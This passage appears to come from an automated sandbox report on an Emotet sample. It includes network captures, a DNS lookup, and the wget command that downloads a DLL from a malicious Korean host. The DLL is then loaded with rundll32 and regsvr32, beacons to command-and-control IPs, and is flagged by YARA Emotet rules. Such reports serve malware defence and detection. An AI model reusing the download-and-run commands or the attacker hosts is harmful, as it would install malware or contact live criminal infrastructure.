                        Jul 21, 2022 06:51:54.970071077 CEST8049742112.175.184.78192.168.2.6
                        Jul 21, 2022 06:51:54.970118999 CEST4974280192.168.2.6112.175.184.78
                        Jul 21, 2022 06:51:54.970221043 CEST8049742112.175.184.78192.168.2.6
                        Jul 21, 2022 06:51:54.970345020 CEST8049742112.175.184.78192.168.2.6
                        Jul 21, 2022 06:51:54.970391989 CEST4974280192.168.2.6112.175.184.78
                        Jul 21, 2022 06:51:54.970473051 CEST8049742112.175.184.78192.168.2.6
                        Jul 21, 2022 06:51:54.970539093 CEST8049742112.175.184.78192.168.2.6
                        Jul 21, 2022 06:51:54.970627069 CEST4974280192.168.2.6112.175.184.78
                        Jul 21, 2022 06:51:54.970664024 CEST8049742112.175.184.78192.168.2.6
                        Jul 21, 2022 06:51:54.970786095 CEST8049742112.175.184.78192.168.2.6
                        Jul 21, 2022 06:51:54.970832109 CEST4974280192.168.2.6112.175.184.78
                        Jul 21, 2022 06:51:54.970895052 CEST8049742112.175.184.78192.168.2.6
                        Jul 21, 2022 06:51:54.971052885 CEST8049742112.175.184.78192.168.2.6
                        Jul 21, 2022 06:51:54.971105099 CEST4974280192.168.2.6112.175.184.78
                        Jul 21, 2022 06:51:55.113981962 CEST8049742112.175.184.78192.168.2.6
                        Jul 21, 2022 06:51:55.114075899 CEST8049742112.175.184.78192.168.2.6
                        Jul 21, 2022 06:51:55.114203930 CEST4974280192.168.2.6112.175.184.78
                        Jul 21, 2022 06:51:55.231602907 CEST8049742112.175.184.78192.168.2.6
                        Jul 21, 2022 06:51:55.231630087 CEST8049742112.175.184.78192.168.2.6
                        Jul 21, 2022 06:51:55.231776953 CEST8049742112.175.184.78192.168.2.6
                        Jul 21, 2022 06:51:55.231782913 CEST4974280192.168.2.6112.175.184.78
                        Jul 21, 2022 06:51:55.231894016 CEST8049742112.175.184.78192.168.2.6
                        Jul 21, 2022 06:51:55.231952906 CEST4974280192.168.2.6112.175.184.78
                        Jul 21, 2022 06:51:55.231971025 CEST8049742112.175.184.78192.168.2.6
                        Jul 21, 2022 06:51:55.232100964 CEST8049742112.175.184.78192.168.2.6
                        Jul 21, 2022 06:51:55.232162952 CEST4974280192.168.2.6112.175.184.78
                        Jul 21, 2022 06:51:55.232182980 CEST8049742112.175.184.78192.168.2.6
                        Jul 21, 2022 06:51:55.232301950 CEST8049742112.175.184.78192.168.2.6
                        Jul 21, 2022 06:51:55.232358932 CEST4974280192.168.2.6112.175.184.78
                        Jul 21, 2022 06:51:55.232418060 CEST8049742112.175.184.78192.168.2.6
                        Jul 21, 2022 06:51:55.232541084 CEST8049742112.175.184.78192.168.2.6
                        Jul 21, 2022 06:51:55.232597113 CEST4974280192.168.2.6112.175.184.78
                        Jul 21, 2022 06:51:55.232614040 CEST8049742112.175.184.78192.168.2.6
                        Jul 21, 2022 06:51:55.232733965 CEST8049742112.175.184.78192.168.2.6
                        Jul 21, 2022 06:51:55.232790947 CEST4974280192.168.2.6112.175.184.78
                        Jul 21, 2022 06:51:55.232892990 CEST8049742112.175.184.78192.168.2.6
                        Jul 21, 2022 06:51:55.233011961 CEST8049742112.175.184.78192.168.2.6
                        Jul 21, 2022 06:51:55.233069897 CEST4974280192.168.2.6112.175.184.78
                        Jul 21, 2022 06:51:55.233091116 CEST8049742112.175.184.78192.168.2.6
                        Jul 21, 2022 06:51:55.233221054 CEST8049742112.175.184.78192.168.2.6
                        Jul 21, 2022 06:51:55.233274937 CEST4974280192.168.2.6112.175.184.78
                        TimestampSource PortDest PortSource IPDest IP
                        Jul 21, 2022 06:51:53.598297119 CEST5929353192.168.2.68.8.8.8
                        Jul 21, 2022 06:51:53.883807898 CEST53592938.8.8.8192.168.2.6
                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                        Jul 21, 2022 06:51:53.598297119 CEST192.168.2.68.8.8.80x4c7fStandard query (0)clotizen.dothome.co.krA (IP address)IN (0x0001)
                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                        Jul 21, 2022 06:51:53.883807898 CEST8.8.8.8192.168.2.60x4c7fNo error (0)clotizen.dothome.co.kr112.175.184.78A (IP address)IN (0x0001)
                        • 45.55.191.130
                        • 213.239.212.5
                        • clotizen.dothome.co.kr
                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        0192.168.2.64977645.55.191.130443C:\Windows\System32\regsvr32.exe
                        TimestampkBytes transferredDirectionData


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        1192.168.2.649779213.239.212.5443C:\Windows\System32\regsvr32.exe
                        TimestampkBytes transferredDirectionData


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        2192.168.2.649742112.175.184.7880C:\Windows\SysWOW64\wget.exe
                        TimestampkBytes transferredDirectionData
                        Jul 21, 2022 06:51:54.164777040 CEST270OUTGET /members/lZTkIb3OkjcV/ HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko
                        Accept: */*
                        Accept-Encoding: identity
                        Host: clotizen.dothome.co.kr
                        Connection: Keep-Alive
                        Jul 21, 2022 06:51:54.443196058 CEST272INHTTP/1.1 200 OK
                        Date: Thu, 21 Jul 2022 04:51:53 GMT
                        Server: Apache/2.2.15 (CentOS)
                        Set-Cookie: 62d8db698429b=1658379113; expires=Thu, 21-Jul-2022 04:52:53 GMT; Max-Age=60; path=/
                        Cache-Control: no-cache, must-revalidate
                        Pragma: no-cache
                        Last-Modified: Thu, 21 Jul 2022 04:51:53 GMT
                        Expires: Thu, 21 Jul 2022 04:51:53 GMT
                        Content-Disposition: attachment; filename="NjszMzh0ar.dll"
                        Content-Transfer-Encoding: binary
                        Content-Length: 574464
                        Connection: close
                        Content-Type: application/x-msdownload
                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ef 34 f3 b7 ab 55 9d e4 ab 55 9d e4 ab 55 9d e4 78 27 9e e5 a7 55 9d e4 78 27 98 e5 2e 55 9d e4 78 27 99 e5 a7 55 9d e4 f9 20 98 e5 b4 55 9d e4 f9 20 99 e5 a5 55 9d e4 f9 20 9e e5 a2 55 9d e4 78 27 9c e5 ac 55 9d e4 ab 55 9c e4 d8 55 9d e4 6a 20 94 e5 af 55 9d e4 6a 20 9d e5 aa 55 9d e4 6a 20 62 e4 aa 55 9d e4 ab 55 0a e4 aa 55 9d e4 6a 20 9f e5 aa 55 9d e4 52 69 63 68 ab 55 9d e4 00 00 00 00 00 00 00 00 50 45 00 00 64 86 07 00 33 62 bb 62 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0e 1d 00 f2 04 00 00 ea 03 00 00 00 00 00 f0 19 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 09 00 00 04 00 00 00 00 00 00 02 00 20 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 f0 f0 05 00 ac 03 00 00 9c f4 05 00 50 00 00 00 00 90 06 00 b8 86 02 00 00 40 06 00 7c 38 00 00 00 00 00 00 00 00 00 00 00 20 09 00 0c 08 00 00 60 c1 05 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 c1 05 00 38 01 00 00 00 00 00 00 00 00 00 00 00 10 05 00 b0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e5 f0 04 00 00 10 00 00 00 f2 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e6 f0 00 00 00 10 05 00 00 f2 00 00 00 f6 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 ac 28 00 00 00 10 06 00 00 0e 00 00 00 e8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 7c 38 00 00 00 40 06 00 00 3a 00 00 00 f6 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 5f 52 44 41 54 41 00 00 fc 00 00 00 00 80 06 00 00 02 00 00 00 30 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 b8 86 02 00 00 90 06 00 00 88 02 00 00 32 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 08 00 00 00 20 09 00 00 0a 00 00 00 ba 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$4UUUx'Ux'.Ux'U U U Ux'UUUj Uj Uj bUUUj URichUPEd3bb" 0 P@|8 `8.text `.rdata@@.data(@.pdata|8@:@@_RDATA0@@.rsrc2@@.reloc @B


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        0192.168.2.64977645.55.191.130443C:\Windows\System32\regsvr32.exe
                        TimestampkBytes transferredDirectionData
                        2022-07-21 04:52:36 UTC0OUTGET / HTTP/1.1
                        Cookie: m=XRoKKtHQPfNbpESB05rTt58KeqenyG5cR8O8yTRIjNXtyv8PRKARydN86Bmx5dag6Tf0TC/3pI7bC5gGERQ4ZBE4N7lZEUIKb1pkgn6ovwRu+LFShFrmc8H4gHFnZ01GoB2proXcc0+QD34BQXcsXhq6uHDi2zrKV6XyQhgOW4l28uHV8XIOSUJIAvG5Vum/iJ7W4iTa4T74+oaU2689LZCx/zQGKWgzRZHDLgYA/eadm3uChEGtZAfPA0qXyIszplE5IkrOn/txpR2z567gQP5LblgXMN6wyYF1qhfv
                        Host: 45.55.191.130
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        2022-07-21 04:52:36 UTC0INHTTP/1.1 404 Not Found
                        Server: nginx
                        Date: Thu, 21 Jul 2022 04:52:38 GMT
                        Content-Type: text/html
                        Content-Length: 162
                        Connection: close
                        2022-07-21 04:52:36 UTC0INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                        Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        1192.168.2.649779213.239.212.5443C:\Windows\System32\regsvr32.exe
                        TimestampkBytes transferredDirectionData
                        2022-07-21 04:52:38 UTC0OUTGET / HTTP/1.1
                        Cookie: uhKAecyPEAU=XRoKKtHQPfNbpESB05rTt58KeqenyG5cR8O8yTRIjNXtyv8PRKARydN86Bmx5dag6Tf0TC/3pI7bC5gGERQ4ZBE4N7lZEUIKb1pkgn6ovwRu+LFShFrmc8H4gHFnZ01GoB2proXcc0+QD34BQXcsXhq6uHDi2zrKV6XyQhgOW4l28uHV8XIOSUJIAvG5Vum/iJ7W4iTa4T74+oaU2689LQCQuyoXtQODjw6FmSNeA1Xr3LcEyw==
                        Host: 213.239.212.5
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        2022-07-21 04:52:38 UTC1INHTTP/1.1 200 OK
                        Server: nginx
                        Date: Thu, 21 Jul 2022 04:52:38 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: close
                        2022-07-21 04:52:38 UTC1INData Raw: 32 39 63 0d 0a d2 05 fb 7d 8f ce 57 a4 e5 25 50 53 6c c9 86 d9 af 03 81 bc 7c 39 15 b7 53 8a 3d 12 e4 fc e0 55 28 39 6a c4 af ea b3 18 ba 88 02 81 12 90 c0 61 05 bd 0a c3 a0 41 5c 2c a1 8a 51 7a b4 87 2e 3f 3f af 0a a8 0f bd 40 1e e1 f0 e1 64 b6 ea e0 dd 35 2b 1e 6a f3 6c 8d da bc c1 ab 54 86 65 04 78 1b d8 84 34 b0 b0 ba 00 83 9d 56 c8 91 61 96 ce c3 ab da 13 59 9a 2e d4 45 c8 28 ac dc e9 62 8a 01 58 7e cf 77 d7 9e c9 e8 70 aa a2 8a c1 72 bf 34 c3 ff 73 16 9b 6c f7 06 4d 32 85 eb e5 7e b7 26 fa a0 46 03 d5 0c d1 bd fe a2 79 f0 b4 79 8b e7 88 90 63 40 61 e0 7a b7 57 54 fd 7d 3a 3d a2 4c 5c fe 3f 55 5a 0e c6 b8 8e 64 a1 dd 2b 46 2d 79 7c 0e 93 2e a7 91 3b ab 75 02 79 2e 8c 74 8f ac 31 d6 c4 4e fc d4 c9 ad 0d a1 dd 54 cf 81 d3 32 64 d7 ce a4 b7 0e 9a 16 d9
                        Data Ascii: 29c}W%PSl|9S=U(9jaA\,Qz.??@d5+jlTex4VaY.E(bX~wpr4slM2~&Fyyc@azWT}:=L\?UZd+F-y|.;uy.t1NT2d


                        Click to jump to process

                        Target ID:0
                        Start time:06:51:50
                        Start date:21/07/2022
                        Path:C:\Windows\SysWOW64\cmd.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "http://clotizen.dothome.co.kr/members/lZTkIb3OkjcV/" > cmdline.out 2>&1
                        Imagebase:0xed0000
                        File size:232960 bytes
                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low

                        Target ID:1
                        Start time:06:51:51
                        Start date:21/07/2022
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6406f0000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low

                        Target ID:2
                        Start time:06:51:52
                        Start date:21/07/2022
                        Path:C:\Windows\SysWOW64\wget.exe
                        Wow64 process (32bit):true
                        Commandline:wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "http://clotizen.dothome.co.kr/members/lZTkIb3OkjcV/"
                        Imagebase:0x400000
                        File size:3895184 bytes
                        MD5 hash:3DADB6E2ECE9C4B3E1E322E617658B60
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low

                        Target ID:3
                        Start time:06:51:58
                        Start date:21/07/2022
                        Path:C:\Windows\System32\loaddll64.exe
                        Wow64 process (32bit):false
                        Commandline:loaddll64.exe "C:\Users\user\Desktop\download\NjszMzh0ar.dll"
                        Imagebase:0x7ff64ee10000
                        File size:140288 bytes
                        MD5 hash:4E8A40CAD6CCC047914E3A7830A2D8AA
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low

                        Target ID:4
                        Start time:06:51:58
                        Start date:21/07/2022
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\download\NjszMzh0ar.dll",#1
                        Imagebase:0x7ff6edbd0000
                        File size:273920 bytes
                        MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low

                        Target ID:5
                        Start time:06:51:59
                        Start date:21/07/2022
                        Path:C:\Windows\System32\regsvr32.exe
                        Wow64 process (32bit):false
                        Commandline:regsvr32.exe /s C:\Users\user\Desktop\download\NjszMzh0ar.dll
                        Imagebase:0x7ff76a230000
                        File size:24064 bytes
                        MD5 hash:D78B75FC68247E8A63ACBA846182740E
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.400285901.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.400314253.00000000014D1000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:low

                        Target ID:6
                        Start time:06:51:59
                        Start date:21/07/2022
                        Path:C:\Windows\System32\rundll32.exe
                        Wow64 process (32bit):false
                        Commandline:rundll32.exe "C:\Users\user\Desktop\download\NjszMzh0ar.dll",#1
                        Imagebase:0x7ff69a9b0000
                        File size:69632 bytes
                        MD5 hash:73C519F050C20580F8A62C849D49215A
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.395347211.000001EA80041000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.395275821.000001EA80010000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:low

                        Target ID:7
                        Start time:06:51:59
                        Start date:21/07/2022
                        Path:C:\Windows\System32\rundll32.exe
                        Wow64 process (32bit):false
                        Commandline:rundll32.exe C:\Users\user\Desktop\download\NjszMzh0ar.dll,AOBplENEwxGsLJOHWaHDTizor
                        Imagebase:0x7ff69a9b0000
                        File size:69632 bytes
                        MD5 hash:73C519F050C20580F8A62C849D49215A
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.397283581.00000292F30B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.397309936.00000292F30E1000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:low

                        Target ID:8
                        Start time:06:52:03
                        Start date:21/07/2022
                        Path:C:\Windows\System32\regsvr32.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\regsvr32.exe "C:\Windows\system32\QKXGFEEVVr\VycaGa.dll"
                        Imagebase:0x7ff76a230000
                        File size:24064 bytes
                        MD5 hash:D78B75FC68247E8A63ACBA846182740E
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.649181292.0000000000491000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.649048864.0000000000450000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_3, Description: , Source: 00000008.00000002.649302129.0000000000578000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:low

                        Target ID:9
                        Start time:06:52:04
                        Start date:21/07/2022
                        Path:C:\Windows\System32\rundll32.exe
                        Wow64 process (32bit):false
                        Commandline:rundll32.exe C:\Users\user\Desktop\download\NjszMzh0ar.dll,BSUOlvQdFaMbSsYDjgkGG
                        Imagebase:0x7ff69a9b0000
                        File size:69632 bytes
                        MD5 hash:73C519F050C20580F8A62C849D49215A
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low

                        Target ID:10
                        Start time:06:52:11
                        Start date:21/07/2022
                        Path:C:\Windows\System32\rundll32.exe
                        Wow64 process (32bit):false
                        Commandline:rundll32.exe C:\Users\user\Desktop\download\NjszMzh0ar.dll,DllRegisterServer
                        Imagebase:0x7ff69a9b0000
                        File size:69632 bytes
                        MD5 hash:73C519F050C20580F8A62C849D49215A
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low

                        Target ID:16
                        Start time:06:52:31
                        Start date:21/07/2022
                        Path:C:\Windows\System32\svchost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                        Imagebase:0x7ff726010000
                        File size:51288 bytes
                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low

                        Target ID:17
                        Start time:06:52:50
                        Start date:21/07/2022
                        Path:C:\Windows\System32\svchost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                        Imagebase:0x7ff726010000
                        File size:51288 bytes
                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low

                        Target ID:25
                        Start time:06:53:37
                        Start date:21/07/2022
                        Path:C:\Windows\System32\svchost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                        Imagebase:0x7ff726010000
                        File size:51288 bytes
                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low

                        No disassembly